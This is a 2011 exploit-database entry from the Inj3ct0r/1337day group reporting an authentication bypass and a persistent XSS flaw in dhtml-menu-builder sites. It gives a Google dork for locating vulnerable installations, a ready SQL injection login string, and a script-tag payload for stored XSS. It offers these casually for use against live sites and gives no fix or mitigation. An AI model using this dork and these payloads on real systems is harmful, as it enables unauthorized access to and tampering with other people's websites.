dhtml-menu-builder Auth bypass and Persistent XSS Vulnerabil



EKU-ID: 181 CVE: OSVDB-ID:
Author: expku Published: 2011-05-09 Verified: Verified
Download:

Rating

Home


#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ############################################# 1 #0 I'm Sid3^effects member from Inj3ct0r Team 1 #1 ############################################# 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #Name :dhtml-menu-builder Auth bypass and Persistent xss Vulnerability #Date : may,06 2011 #Vendor Url :http://dhtml-menu-builder.com/ #Dork:Powered By: "Powered by dhtml-menu-builder.com" inurl:.asp?id= #Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> #Big hugs : Th3 RDX,Hanan_butt,Sugar #special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn! pEr.S!,cr1m1n4l ############################################################################################################### About: Sothink DHTML Menu is the best drop down menu builder, which creats great JavaScript menu without coding ############################################################################################################### Auth Bypass Vulnerability : ######################### use ' or 1=1 or ''=' in both login and password and your in ;).This is was just for fun :=) Sqli was found by Caddy-Dz on the same web-app.. Persistent xss Vulnerability: ############################ The Xss vulnerability was checked with admin rights. insert any script (like "><sctip>alert(/woot/)</script> and just update it. :) ############################################################################################################### #